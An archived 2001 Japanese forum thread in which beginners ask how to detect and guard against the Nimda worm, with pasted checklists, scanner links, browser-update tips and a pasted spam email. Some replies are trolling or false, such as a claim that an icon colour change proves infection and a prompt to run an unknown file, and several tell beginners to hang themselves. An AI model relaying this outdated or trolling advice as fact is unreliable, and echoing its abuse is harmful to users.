スーパー初心者のためのMSNウイルスすれ。

このエントリーをはてなブックマークに追加
1初心者。
専門用語飛び交いすぎです。
「・・・・のワクチン、買っていれとけ!!!」とか、
初心者でも出来る対策を簡単な言葉で教えていただけたらと・・・。
2 :01/09/19 11:48 ID:spzt.8VY
感染ファイルってどうやって検索すればいいの?
34:01/09/19 11:48 ID:O9eDUWM2
よろしく
4 :01/09/19 11:51 ID:Z1402CAA
>>5 ありがとう
5名無し:01/09/19 11:51 ID:F6UjzOVw
感染していないなーと思ったらSP2をダウンロード
すればよい。感染してるなーと思ったら回線切ってそ
れで首つろうYO!
6 :01/09/19 11:53 ID:oestFoJ6
IE5.5なら大丈夫だよね?
他のサイト見に行っても大丈夫?
7 :01/09/19 11:54 ID:dEiwDa16
sage
8ななし@IIS:01/09/19 11:54 ID:fq/kPh0U
初心者はパソコンの電源切って、
おとなしく寝ててください
9  :01/09/19 11:56 ID:998nd5BY
世知辛い世の中だね。
10 :01/09/19 11:58 ID:muRQhq5k
小難しくてわかんねーからもっと
丁寧に教えやがれ、という趣旨のスレを立てる1
11:01/09/19 11:58 ID:7z8g0MW6
ノートンのワクチン入れとけば大丈夫ですよね。
12 :01/09/19 11:59 ID:7lDs22Ws
hotmailのサイトは?
13 :01/09/19 11:59 ID:dEiwDa16
>>5
聞く前にトップに書いてあるリンクの情報を読もうとは思わないのかい?
14こぴぺ:01/09/19 12:00 ID:XL1ZIYFM
W32.Nimda.A@mm、とりあえずの対策(気休め)

・まず感染の確認
その1:readme.exeやreadme.eml、MEP*.TMP.EXEで検索をかける(ローカルハードドライブを選択すること)
なお、readme.exeでWAVファイルみたいになっているものもワーム。
また、OutlookExpress系のメーラーでは送受信メールの拡張子が*.emlなので、
emlが出たからと言って必ずしも感染しているとは限らない。

その2:Cドライブがネットワーク共有を勝手にされていたら感染している

その3:システムがスローダウン、いつもよりも明らかに遅く、しかもやたらネットにアクセスしまくる場合も感染している疑い濃厚。

・対処法
現在のところ不明。
感染ファイルを削除しても、既に正当なWindows DLLとRICHED20.DLLを置き換えているのでムダ。
また、感染後にIE5.5SP2などにしても意味なし。

・感染している場合
レジストリの
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
以下にある実行ファイルに感染している。

・自己防衛法
IE5.5SP1かSP2にバージョンアップする(ただしダウンロードに非常に時間がかかる)
JavaScriptをOFFにしておく(直接リンクしてしまった場合はやはり実行されてしまうので注意)
あやしげなメールが来ても開かない(README.EXEという添付ファイルは絶対にクリックしない)
駆除ツールを使う(まだ出てない…)
NetscapeNavigatorにする(何か間違ってる…)
15 :01/09/19 12:02 ID:P6/AedFA
16初心者:01/09/19 12:02 ID:exibgqlk
自分が借りてるWebサーバの自分のページが大丈夫かどうかは、
どうやって確認するんでしょうか。
17 :01/09/19 12:04 ID:73CIJZGY
IE5.0、5,5って無縁の話されてもなあ。
それよりIE4.0で感染するのかどうか知りたいんだけど。
18:01/09/19 12:09 ID:3/bSVvek
>>13
読んだってわからないんじゃないか。
あんたのいうことはもっともだが。
19untitled:01/09/19 12:10 ID:903wkvXE
>>17
Microsoft ではもう確認もせず、情報も出さない惧れあり。
善意で検証してくれる人がいないと分かりません。
#時間と機材があれば、自分でやるのは難しくないのですが…
20名無しさん:01/09/19 12:10 ID:7lDs22Ws
hotmailって、MSNだけど行ったらやばいのかな?
21初心者さんへ:01/09/19 12:11 ID:3/bSVvek
パソコン屋へいったら?
金はとられるが、それが一番確実。
22 :01/09/19 12:12 ID:yMcYQ9GQ
本スレ読んでてもわからないなら、
ネットつながない方がいいだろ。
23  :01/09/19 12:15 ID:WTghJb5I
検索したら10000個のファイルが見つかりましたって出たぞ
そしてもう一度検索してみたら0個だった
どゆこと???
24恥ずかしいから下げ:01/09/19 12:16 ID:vDZxw.Rs
頒布←これなんて読むの?
25.:01/09/19 12:16 ID:5i4BbajE
漏れの友人も大騒ぎしてる
自分で調べもせずに次から次へと・・・
分からないからって逆切れすんなよ( ゚Д゚)ゴルァ!
ウイルス定義の更新すらしてないような厨房はネット繋ぐな、迷惑だ。
26 :01/09/19 12:18 ID:/8K9yolQ
>>24
>頒布←これなんて読むの?
読み方はフブじゃないの?
たくさん複製して世間に広く分け与えることじゃないの?
27.:01/09/19 12:18 ID:5i4BbajE
>>24
辞書で調べれ
意味まで出てくるぞ
http://dictionary.goo.ne.jp/cgi-bin/jp-top.cgi
はんぷ 【頒布】

(名)スル
配って広く行きわたらせること。「小冊子を―する」
28 :01/09/19 12:22 ID:/8K9yolQ
>>25
わたし、貧乏だから
みんなが装備しているような
ワクチンソフトを持っていない。
打つだし脳。
気休めかもしれないが
ここに無料のワクチンソフトがあるよ。
http://www.interc.ne.jp/index.html
無いよりもあったほうがまし。
29ななし:01/09/19 12:23 ID:LlIGXruA
ネットスケープの4.7使ってるんだけど、これは平気なの?
30 :01/09/19 12:25 ID:zBOpeQC.
初心者質問スマソ

なんでMSNウィルスって呼ばれてるの?
MSNが感染に荷担したの?
31 :01/09/19 12:26 ID:.xGaQ9lU
MSNのトップがやられたから
32結論としては・・・・:01/09/19 12:26 ID:3/bSVvek
ワクチンを買ってインストールせよ。
33 :01/09/19 12:27 ID:Davx2OCk
私自身に危険はないんでしょうか?
そういえば、頭が重い気がします。
病院に逝くべきでしょうか
34まじで厨房に語りたい。小一時間語り詰めたい:01/09/19 12:28 ID:RpkGMlcw
W32.Nimda.A@mm、とりあえずの対策(必要条件)

2ちゃんなんて見てないで、皆のためにも
とっとと回線切って首吊れ
35 :01/09/19 12:29 ID:spzt.8VY
つーかお前ら割れ使ってるからファイル更新出来ないだろ プ
36ド素人:01/09/19 12:30 ID:AGkf8kDY
意味わからん
37 :01/09/19 12:31 ID:0C89g52A
>>35
割れでも更新できますが、何科?
38_:01/09/19 12:33 ID:o1Xmk.Yk
SP2とかってどこで見るのよ?
俺のIE5.5は「バージョン:5.50.4134.0600」ってなってるけど、
これは大丈夫な奴なのかい?
39 :01/09/19 12:34 ID:Dhsl8eBY
わかんないからおしえて
40 :01/09/19 12:34 ID:xEhJdrQw
よくわからんのやったらデータセーブして再インストール
後に雑誌に付いてるCD-ROMでアップグレード
41おひ「:01/09/19 12:36 ID:rydEHM7E
更新バージョン:SP2
ってなってればSP2
4238:01/09/19 12:37 ID:o1Xmk.Yk
MSのところにあった。俺のはただの5.5だった。鬱。

5.50.4134.0600 Internet Explorer 5.5
5.50.4308.2900 Internet Explorer 5.5 Advanced Security Privacy Beta
5.50.4134.0100 Windows Me (4.90.3000)

http://www.microsoft.com/japan/support/kb/articles/JP164/5/39.htm
43 :01/09/19 12:37 ID:H2D68rEQ
ニュースサイトは、安全IEなバージョンを報道するのみで
ワームの動作を防止するためのJavaScriptを切るなどの対処法を
全く説明しないゾ。
やはりウェブ系報道機関は、他の報道機関が報じた記事や
当事者の公式発表をコピペして垂れ流すだけか。
44 :01/09/19 12:38 ID:spzt.8VY
IE5.00ってやばいすか?
SP2って書いてあるんすけど
45  :01/09/19 12:41 ID:qpXKNfss
どいつもこいつもエロサイト行って勉強してこい。
って思った。
1回eroxにでも泣かされて来い。
46 :01/09/19 12:42 ID:/yUtihZs
5.5SP2やっとDL完了・・30分かかったよん
47 :01/09/19 12:42 ID:4p3db42g
ワーム=虫ってどういうことですか?
48 :01/09/19 12:44 ID:xEhJdrQw
マイクロソフトのサポートセンターに電話してください
49 :01/09/19 12:45 ID:iOVUc1CA
>46
オレは3時間かかったよ(泣きワラ
50ななし:01/09/19 12:47 ID:LlIGXruA
アップデートしただけなのに、デフォルトのブラウザが
ネスケからIEに勝手に変わってた。
51 :01/09/19 12:48 ID:zsQE2Q3w
>>33
狂牛病だろ
52 :01/09/19 12:48 ID:/yUtihZs
5.5SP1でも感染するらしい
53 :01/09/19 12:48 ID:MAmLkAiE
どなたか、お教えください。
フリーのタブブラウザを使っているんですが、
Java切っとけば大丈夫なんでしょうか?
ちなみに、Moon Browserです。
54 :01/09/19 12:48 ID:7jAGOnQE
Dear E-Commerce professional ; This letter was specially
selected to be sent to you . If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
2416 , Title 8 , Section 305 . This is not multi-level
marketing ! Why work for somebody else when you can
become rich within 97 months ! Have you ever noticed
the baby boomers are more demanding than their parents
and the baby boomers are more demanding than their
parents . Well, now is your chance to capitalize on
this ! WE will help YOU sell more and process your
orders within seconds ! You can begin at absolutely
no cost to you ! But don't believe us ! Prof Anderson
of Colorado tried us and says "Now I'm rich, Rich,
RICH" ! We are licensed to operate in all states .
If not for you then for your LOVED ONES - act now !
Sign up a friend and you'll get a discount of 80% !
Best regards !
55マシリト総理 ◆84VbUMtQ :01/09/19 12:49 ID:eKw5kRXU
>>42
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm
こちらのページも参考にするとよいかも
SP2及びIE6のバージョンまで網羅してあるよ
56:01/09/19 12:50 ID:Qs49Ap5g
メモリが少ないのでアプデータできないのですが
2ちゃん以外はどこにもいかなければいいのですか?
57 :01/09/19 12:50 ID:xEhJdrQw
すげーなお前ら、よくそんなんで2ちゃんねるなんかこれるな、
どうせファイアーウォールなんかいれてないんだろ、クッキー
もOKで情報垂れ流してんだろ、JAVAもきってないんだろ、
もしかしたらこれも何いってるかわからんやついる?
58感染しました:01/09/19 12:50 ID:zKEP5/x6
IE5.5SP2 なんだけど
システム全体のスキャンかけたらW32.Nimda.A@mmを検出して削除しました。
とりあえず大丈夫なんだけど原因がわかりません。
考えられる感染原因を教えてください。
マジでマジレスを希望します。
5938:01/09/19 12:51 ID:o1Xmk.Yk
つーか、ie5setup.exeは落としたけど、
IE5.5SP2自体が実はウィルスだったという可能性もあるから
インストールはしないでおくよ。
60  :01/09/19 12:51 ID:ZGnsXA6c
Internet Explorer 6 をダウンロードしちゃえば問題無いよ

 http://www.microsoft.com/windows/ie_intl/ja/
61 :01/09/19 12:51 ID:5YeAXAIU
色々アップデートしたら、
アドレスのhttp://の左側にあるマーク(紙の上にeの文字)
の色が水色っぽく変わった
みんなもそうなの?
62:01/09/19 12:52 ID:R2YEcb/2
ニュース版の上のリンクSP1やんけ
63 :01/09/19 12:52 ID:s3PsnOCQ
>>56
ワラタヨ
64 :01/09/19 12:52 ID:UjD89gUM
>>57
その通りですが、なにか?
65名無しさん:01/09/19 12:53 ID:70l4IFsk
>>57
javaとjavascriptの区別ついてねーだろ
66:01/09/19 12:54 ID:7IoR6iQE
>もしかしたらこれも何いってるかわからんやついる?
言ってる事は判るけど面倒で何もやってねぇ。
やべーかな、やっぱ・・・。
67名無しさん@お腹いっぱい。:01/09/19 12:54 ID:uwpoRi5M
>>58
感染経路が複数あります、IE5.5SP2は感染サイトを参照しても自動的に感染しないというだけです。
共有ドライブがある、IISを導入している・・・・
OSの種類やバージョンを書いてみれ。
68 :01/09/19 12:55 ID:/yUtihZs
東スポではこのウィルスもラディンのせいにしているよ(藁
69 :01/09/19 12:55 ID:drzf/ris
>>61
紛れもなくウイルスに感染した証拠です。
70 :01/09/19 12:55 ID:0JDuiGy.
幹線の疑いのある奴ら、
とりあえずここ逝ってオンラインスキャンしてこい
●トレンドマイクロ オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp

削除は出来ないから、このワームが検出されたら
1. アンチウィルスソフト買って、サポセン併設の
 パソコン屋で事情を説明して、アップデータを落としてもらう<有償
2. 金が無いのならシステム再セットアップ
3. 嫌だというのなら回線切って首を吊る
7158だけど:01/09/19 12:56 ID:zKEP5/x6
マジの話なんだよ。
原因がわからん。
誰か教えて。
72 :01/09/19 12:56 ID:/yUtihZs
ファイヤーウォールまんせ〜〜!(ゲラ
73 :01/09/19 12:57 ID:zvPGo23.
東スポはPCではなく、記者の頭にウィルスが感染したようだな。

ま、売るためだ。煽りは藁ってすまそう。
74NeWS SITEs ◆NeWSITEs :01/09/19 12:58 ID:JSlZ/h2Q
>>60
別の意味で問題だらけだったりして
75 :01/09/19 12:59 ID:muRQhq5k
(´ー`)。oO(ウィルス怖いね)
76NeWS SITEs ◆NeWSITEs :01/09/19 13:00 ID:JSlZ/h2Q
>>57
ファイアーウォールいれてればいいんですか?
クッキーって情報垂れ流すんですか?
77初心者向けだと思うの完成:01/09/19 13:08 ID:1L5pANOU
状況報告ver1.02(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
 →java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。

LANによる感染
 社内に一人でも対策してないひとがいてノーパスとかにしていた場合
 LANの共有フォルダを使っても自己増殖する。
78量産型ラディン:01/09/19 13:08 ID:39GVbFRk
東スポ曰く、
このウイルスはラディンが仕掛けた物でコンピュータを狂わせて核ミサイルを発射させる事も可能。
このウイルスは第3次世界大戦の幕開けだ。
ラディン達は世界中のコンピュータを自由に操る事が出来ると言うのか。

…らしいです。
ま、いっかぁ東スポだし。
79続き:01/09/19 13:09 ID:1L5pANOU
状況報告ver1.02(後編)
感染の有無の確認
1.●トレンドマイクロ オンラインスキャン
http://housecall.antivirus.com/housecall/start_jp.asp

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
 *.emlが大量にHITした際は確定。
 ただし、それが以前に自分の書いた見覚えのあるメールだったら、
 それはウイルスではない。
 そうでないときは後者2個を削除して様子を見る。
 ファイルのDLを拒否してもファイルが作成されたという報告があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする。


感染時の対応
 感染してしまった後は、アップデートしても無意味。
 とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように
ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン
ツを回らない。

 ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
8026:01/09/19 13:10 ID:6OZWLuBo
>>24
私、間違えていた。

はんぷ 【頒布】

(名)スル
配って広く行きわたらせること。「小冊子を―する」
81 :01/09/19 13:11 ID:f5xqJD/.
>>78
omosiroi!
82 :01/09/19 13:13 ID:6OZWLuBo
>>61
>色々アップデートしたら、
>アドレスのhttp://の左側にあるマーク(紙の上にeの文字)
>の色が水色っぽく変わった
>みんなもそうなの?

InternetExproler6の特徴だよ。
83 :01/09/19 13:14 ID:muRQhq5k
クッキーてそんなやばいのか?
2chに書けないからオンにしてるんだけど
84名も無きDCネッター:01/09/19 13:15 ID:81fajNg6
あのぉ、、、
ドリームキャストは感染しませんよね?
少し心配です。
85 :01/09/19 13:15 ID:kUOVpNis
なんだか、よくわからないから2chから外にでないように
してよっと
86 :01/09/19 13:17 ID:jQA0jqGc
漏れザウルスだけど感染しそうで怖い!
87 :01/09/19 13:19 ID:1L5pANOU
>>84
 ドリキャスは、性能がアレな代わりにウイルスには強いよ。
 なんせまともな記憶媒体が内部RAMとVMしかないから……
 OSすら起動のたびにGDから読み取りだし
88名も無きDCネッター:01/09/19 13:21 ID:81fajNg6
>>87
ありがとうございます。
安心しました。

ドリキャスマンセー!
(半角カタカナ打てません)
89 :01/09/19 13:21 ID:xEhJdrQw
>>83

ZDNNでcookie、悪用で検索してみ あとウェブバグも
でもあそこはソフトバンクだからそれで儲けてる側で
ちょっとしか取りあげてないけど
90 :01/09/19 13:24 ID:zsQE2Q3w
>>88
(ww
91NeWS SITEs ◆NeWSITEs :01/09/19 13:24 ID:JSlZ/h2Q
16日に中国からのウイルス攻撃は予想されていたんですね。
92 :01/09/19 13:26 ID:xEhJdrQw
あとここのページもウェブバグが検出されてて
どうやら追跡されてるようです
Bugnosis analysis of: ニュース速報@2ch掲示板 (http://news.2ch.net/news/#5)

Highlighted images may be Web bugs.
Properties Contact Image URL
Tiny, Once, Domain http://f1.aaacafe.ne.jp/~starplan/newsrogo.gif

Property name Description

--------------------------------------------------------------------------------

Tiny image is tiny, so is probably not meant to be seen
Protocols image URL contains more than one Web protocol name (e.g., "http:" twice)
Cookie image URL overlaps with the cookie field too much
Lengthy image URL is unusually long
Domain image comes from a different domain than the main document
Once image is used only once in the document
TPCookie image comes from a different domain than the document and manipulates a cookie (Third Party Cookie)
Recognized compares the URL against a set of recognized Web sites

--------------------------------------------------------------------------------


Copyright © 2000, 2001 Privacy Foundation. All rights reserved.
Right-click in this window to configure Bugnosis.
Help / Readme File (on this computer)
Bugnosis Web site
93だれかー_さすけ_てー:01/09/19 13:26 ID:dEIFz/4k
きゃはは ネットはブッ壊れてもいいパソコンでやってたからいいかも

ってかファイルとか消えないなら問題無いや
94 :01/09/19 13:28 ID:6OZWLuBo
>>92
>Bugnosis analysis of: ニュース速報@2ch掲示板
> (http://news.2ch.net/news/#5)

ここが意味不明
95ラディン第三形態:01/09/19 13:29 ID:8pBkGXJQ
つーか、東スポ煽りすぎ(w
あの記事見たら素人は滅茶苦茶ビビるぞ(w
96はて?:01/09/19 13:30 ID:oaR/VUnY
よくわからんが、
>2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
ちゅうことなら、2chのサーバもやばいんでは?
2chだけみてれば安心、というわけにはいかないのでは?
97 :01/09/19 13:32 ID:4r89trDc
僕のPC内のエロ画像もラディンに見られちゃいますか?
98 :01/09/19 13:34 ID:1L5pANOU
>>96
 対策がちゃんとしている鯖は安心だけど
とりあえずウイルスの中身がまだ完全にわかっていないようなので
ここも過信はしない方がいいと思う
99 :01/09/19 13:35 ID:ALUfLgrg
スーパーピンチ
100 :01/09/19 13:36 ID:TUtUByPw
AAずれますよね?5.5 6.0は
101 :01/09/19 13:36 ID:oaR/VUnY
>>98
2chみるにしても、IE5.5 sp2かIE6にしておけ!!
っちゅうことですかね?
102 :01/09/19 13:38 ID:oaR/VUnY
そういえば、IE6の最新バージョンってどっかの雑誌の付録にもうついてます?

ネットから落とすとウン時間かかりそうなので・・・
103 :01/09/19 13:38 ID:ALUfLgrg
5.1のSP2ならAAずれねぇし安全だぜ。多分。
104 :01/09/19 13:38 ID:Gmx2gDPs
IEからネスケに乗り換えれば安全なの?
105 :01/09/19 13:40 ID:LvaoUGzc
>>101
それ以外は即逝く
あと、JavaScriptもきっといたほうが良いね。
106初心者1号:01/09/19 13:41 ID:zsQE2Q3w
>>100
僕、今さっき5.5のSP2にしたんだけど
ずれないんだよね、、、なんでだろ?

ちなみに、かちゅ〜しゃで見てます。
107 :01/09/19 13:42 ID:6OZWLuBo
>>102
IE6の正式版が出たというデマが
ニュース速報板で数日前に流れたけれども
現在もテストバージョンしか出ていないので
サーバーからダウンロードするしかない。
108:01/09/19 13:42 ID:A2birs9c
MAC使ってるよ。
ウイルスうらやましい。
109 :01/09/19 13:42 ID:LvaoUGzc
>>104
おれはネスケのことは、ようしらんが、
大丈夫みたいYO
110 :01/09/19 13:43 ID:6OZWLuBo
>>104
>IEからネスケに乗り換えれば安全なの?
2ちゃんの話によるとそうらしいね。
でも、本当かどうか知らない。
111 :01/09/19 13:43 ID:LvaoUGzc
>>106
カチュ〜シャは関係ないだろ。
112 :01/09/19 13:44 ID:JSlZ/h2Q
>>108
昔は MAC のウイルスって結構あったけど、いまはウイルスあっても流通させるマシンがないよね。
113 :01/09/19 13:45 ID:JSlZ/h2Q
>>111
んじゃ、タブブラウザは安全なの?
114 :01/09/19 13:45 ID:LvaoUGzc
>>110
ただ、メールで送られてきたり、職場などの、
ネットワークで送られてきたら、対応しようがない。
115_:01/09/19 13:45 ID:t5ePDc5w
116 :01/09/19 13:45 ID:oaR/VUnY
ここまできたらはづかしついでにききます。
JavaScript切るのって、
「セキュリティ」「レベルのカスタマイズ」「セキュリティの設定」の
「Javaアプレットのスクリプト」を無効にすればいいんだよね?

JavaアプレットのスクリプトってJavaScriptとは実は違うもののような気が
してならないんだけど・・・
117 :01/09/19 13:46 ID:1L5pANOU
>>104
 寝輔でも即死しないだけで、直リンでファイル踏まされると
DLダイアログは出るはずだからちゃんと拒否してねん
118 :01/09/19 13:46 ID:JSlZ/h2Q
>>111
ああフォントの話か。
119【注意されたし】:01/09/19 13:46 ID:6bKYUMSc
Nimdaを逆さから読むと、admin。
adiminからadministratorという言葉が容易に連想できる。
administratorとは、管理者。
このことから、感染したPCをウイルス開発者が管理するスクリプトがウイルスに含まれている事は明白である。
120ななし@IIS:01/09/19 13:48 ID:fq/kPh0U
AAずれる人は
ツール->インタネットオプション->全般->フォント->Webページフォント
これをMS PゴシックからMS ゴシックに変更して
121 :01/09/19 13:49 ID:OO3wQbOI
>>104
今乗り換えるなら、モジラの方がいい。
122素人:01/09/19 13:49 ID:6bKYUMSc
>>116
違うよ。
この際だから、両方オフでね。
ついでにダウンロードも無効にしておきましょう
123 :01/09/19 13:49 ID:LvaoUGzc
>>113
かちゅしゃはよくわかんねぇYO!!
ブラウザが開くの?
124ioi:01/09/19 13:49 ID:y6NgI00I
admin 2 3w
125 :01/09/19 13:49 ID:bCsgO3Gg
東スポを今から買ってくるよ
126 :01/09/19 13:50 ID:1L5pANOU
>>116
超初心者向けで作ったから、JAVAとjavaの違い説明するの面倒だったのよ。
127untitled:01/09/19 13:50 ID:903wkvXE
>>96
> ちゅうことなら、2chのサーバもやばいんでは?
さすがに Windows をサーバーに使ってはいないでしょう
から、2ch に感染ということはなさそう。
128 :01/09/19 13:51 ID:cBk407FU
まとめてくれ!
129 :01/09/19 13:52 ID:/.OemXTo
>>107
アータがデマだ。正式版はもう出た。
ココを読め。
http://yasai.2ch.net/test/read.cgi?bbs=win&key=1000671972
130  :01/09/19 13:53 ID:7MPHSOfA
IE5.0SP2 は危険かな?
131 :01/09/19 13:54 ID:JSlZ/h2Q
>>129
Windows UPDATE や、 IE6のダウンロードファイルに、なにか仕掛けがあったらスゴいけど
132 :01/09/19 13:54 ID:oaR/VUnY
>>112
どうも。
ということは、その下の
「アクティブスクリプト」と「スクリプトの貼り付け処理の許可」
かな?

ダウンロードは「ファイルのダウンロード」だってのはわかりました。
133 :01/09/19 13:54 ID:1L5pANOU
>>130
 即死は無し。
 だけど覚えの無いDLダイアログが開くことあるからそれを拒否して。
134nanasisan:01/09/19 13:55 ID:KSWVQD0E
>>130
問題なしです。
もし前のほうのスレでワシの書き込みを読んで判断されてるようなら申し訳ない。
135 :01/09/19 13:55 ID:IVqXYvyw
ネスケなら問題ないんですか?
136 :01/09/19 13:56 ID:OVdoWqpg
SP2のインストールが途中で止まったりして上手く行かない人へ

1.最小構成インストール、又はブラウザのカスタマイズ(C)
を選ぶ。

2.次の画面の右下のボタン「詳細設定」を押して、「ダウンロードのみ」
を選ぶ。

3.ダウンロードが終わったら、すぐにインストールせずに、
PCをセーフモードで再起動

4.セーフモードで起動した状態でインストール

これでインストールできます。
137:01/09/19 13:57 ID:t5ePDc5w
リロードすると訳のわからない文字が出てくるのですが・・・
138  :01/09/19 13:58 ID:7MPHSOfA
>>133 >>134
有難う御座います 気をつけます!

あと申し訳なくないです
前の方のスレ読んで色々チェックしたりできたので
とても感謝してます〜
139 :01/09/19 13:58 ID:1Nv4PlFc
てすと
140nanasisan:01/09/19 13:58 ID:KSWVQD0E
>>137
メニューバーの「表示」→「エンコード」以下で「日本語(自動認識)」が選択されてる?
141林檎の嘆き:01/09/19 13:58 ID:XLpArY/.
なんか仲間外れにされた気分・・・・・・
142 :01/09/19 13:59 ID:7X3k5Gy6
テロ募金のクリックしたらおみやげもらっちゃいました
打つだし脳
143 :01/09/19 13:59 ID:1Nv4PlFc
てすと
144 :01/09/19 13:59 ID:6Y135P7o
ところでひろゆき顔出さないけど
なんか対応早いな!
145 :01/09/19 14:00 ID:1L5pANOU
>>141
 俺は仲間はずれになりたかったよ(苦藁
146nanasisan:01/09/19 14:01 ID:KSWVQD0E
# 以下初心者の方にはお勧めできない内容です

>>141
VMwareとかを入れて仮想Windowsマシンを作れば擬似的にウイルスに感染させられるぞ。
ただ、使い方を誤ると本来のマシンのほうに影響が及んでしまうかもしれないのと、
ネットワーク上にバラまくと迷惑なので注意。
147nanasisan:01/09/19 14:02 ID:KSWVQD0E
>>144
2ちゃんねるのWebサーバはapacheなので今回のトラブルとは全く無関係ですよ。
148ありがとうございます。:01/09/19 14:03 ID:t5ePDc5w
>>140
自動認識になってますが・・・
書き込みが終わった後にも変な文字が・・・
149 :01/09/19 14:04 ID:VjkZRXtk
鉄壁は対応した。
ウイルス定義ファイルダウソ
http://www.sourcenext.com/download/tepeki/dat_win.html
150 :01/09/19 14:04 ID:6OZWLuBo
>>129
まだ、正式版は出ていないよ。

でたよ Ie6! 〜バージョン3〜
http://yasai.2ch.net/test/read.cgi?bbs=win&key=1000671972

33 名前:Name 投稿日:01/09/17 18:50
マイクロソフト株式会社にメールで問い合わせたところ、現在皆さんがダウンロードされているファイルが正式版では無いことが判明致しました。
社内で動作テスト中の最新版だそうです。
正式版の公開は、Windows xp 前後を予定しているらしいです。
151うほ!:01/09/19 14:05 ID:zsQE2Q3w
nanasisanはこちらにもいらしたんですね!

お疲れさまです。がんばってください!
152nanasisan:01/09/19 14:05 ID:KSWVQD0E
>>148
それってインストールがうまくいっていないのでは?
ちなみにインストールしたIEのバージョンは?
153はあん:01/09/19 14:06 ID:tyUuhn76
よくわからないからIE6をインストールした。
5.5とかあるけど数字が大きい方がいいんでしょ?
154 :01/09/19 14:06 ID:1L5pANOU
>>148
 そのうちいきなり直ったり、再起動後に直ってたりするから、
面倒でもエンコード→日本語(自動選択)の方で我慢
155マカーの嘆き:01/09/19 14:07 ID:XLpArY/.
>>145
146の方法でおいらも感染してみるよ!
HDDを分けっこして、macdowsマシン誕生!!
156129:01/09/19 14:08 ID:3AnOZHiA
>>150
あんたそんなカキコ信じてどうするよ。
そんなんじゃ2ch生きていけないぞ。
それからもっと下の方まで読んでくれ。
157 :01/09/19 14:10 ID:ljeMpPVA
msnなんてみてるのは初心者かDQNの証拠。
設定の仕方を知らないだけ。
あんな、偏った編集方針のHPを喜んでみているヤツは国賊。
158 :01/09/19 14:10 ID:p2sAn732
>>136
ありがとーありがトー多謝です。
今日一日があなたにとって幸せでありますように
159 :01/09/19 14:10 ID:KVCCudAA
>>153
大きいマンセー
160  :01/09/19 14:12 ID:lmu1o5BA
IPA意外とわかりやすいかも↓

http://www.ipa.go.jp/security/topics/newvirus/nimda.html
161てろりん:01/09/19 14:13 ID:YO8.LQOA
おしえてくださ〜い!!
CドライブをWAVで検索したらWAVが出てきたんだけど、これって感染してますか?
よろしくお願いします!!
162厨房:01/09/19 14:14 ID:I3H4ktQc
>>157
WindowsユーザーならIEでMSNが常識だ!!
百歩譲ってyahoo japan!
163:01/09/19 14:14 ID:I6iVryNY
2ちゃんは大丈夫なんかな?
164 :01/09/19 14:15 ID:1L5pANOU
>>161
 WAVはWINの音声データ形式。
 それは見つからん方が珍しいから安心して。
165ななしーさん:01/09/19 14:15 ID:FF9YYw4I
は?
166 :01/09/19 14:15 ID:N4U8iOCw
>>161
実行してみ
167nanasisan:01/09/19 14:16 ID:KSWVQD0E
>>162
ブラウザ起動直後にいきなりインターネット上のページが見えてしまうのは、それはそれで不便でない?
俺だけかな、lynxでもw3mでもmozillaでもIEでもホームページをブランクページにしてるのは(^^;
168ななしーさん:01/09/19 14:17 ID:FF9YYw4I
俺のIDがFF9だ!
169 :01/09/19 14:17 ID:0hSV8Kps
msnなんて行ったことないかも・・
何なの?検索エンジン?
170厨房:01/09/19 14:18 ID:I3H4ktQc
>>167
ネタでし
171 :01/09/19 14:18 ID:N4U8iOCw
>>168
FF・ドラクエ板1名様ご案内〜
172 :01/09/19 14:18 ID:EW1aIbKA
IE6って5.5よりもかなり重いんですか?

非力なパソコンなんでそれが心配。
173 :01/09/19 14:20 ID:OVdoWqpg
>>158
(*^-^*)/
174nanasisan:01/09/19 14:20 ID:KSWVQD0E
>>169
"Microsoft Network" の略。IEではデフォルトのページがmsnになっている。

>>172
5.5とは大して違わないと思う。機能的にもあまり変わってないし。
175msn厨房 逝ってよし:01/09/19 14:21 ID:3sY7l68o
こんなMSN厨房がいるからウイルスが流行するわけだな。
http://yasai.2ch.net/test/read.cgi?bbs=win&key=998723304&ls=50
176 :01/09/19 14:21 ID:1L5pANOU
 今回のウイルスはIEがMSNのHPとセット商法みたいなことしてたせいで
被害の拡大がひどすぎるなやぁ……
177ありがとうございます。:01/09/19 14:21 ID:t5ePDc5w
>>152再インストールしたら解決しました。ありがとうございました。
178厨房:01/09/19 14:21 ID:I3H4ktQc
>>169
なに!!!!
貴様はネットスケープナビゲーターの工作員だな!!!
MSNを知らないなんて、厨房認定!
回線切って、焼くのを失敗したCD-Rを投げて遊べ!!
179 :01/09/19 14:21 ID:Gmx2gDPs
http://www.microsoft.com/japan/ie/
かっこよくなっている。
180てろりん:01/09/19 14:21 ID:YO8.LQOA
>>164>>166
そうですか、安心しました。音声ファイルだったんですね。
ありがとうございました!
181:01/09/19 14:23 ID:LRxTSLIM
MAC使ってるよ。
僕もみんなとワイワイしたいよ。
182 :01/09/19 14:23 ID:f0qDqlGU
水原優君結婚して
183厨房:01/09/19 14:24 ID:I3H4ktQc
>>181
エミュレ−タ−でマックをwinにしる!!
感染体験(゚д゚)ウマー
184ナナシサソ:01/09/19 14:25 ID:uy8Pfu/w
W32.Nimda.A@mm、とりあえずの対策(気休め)
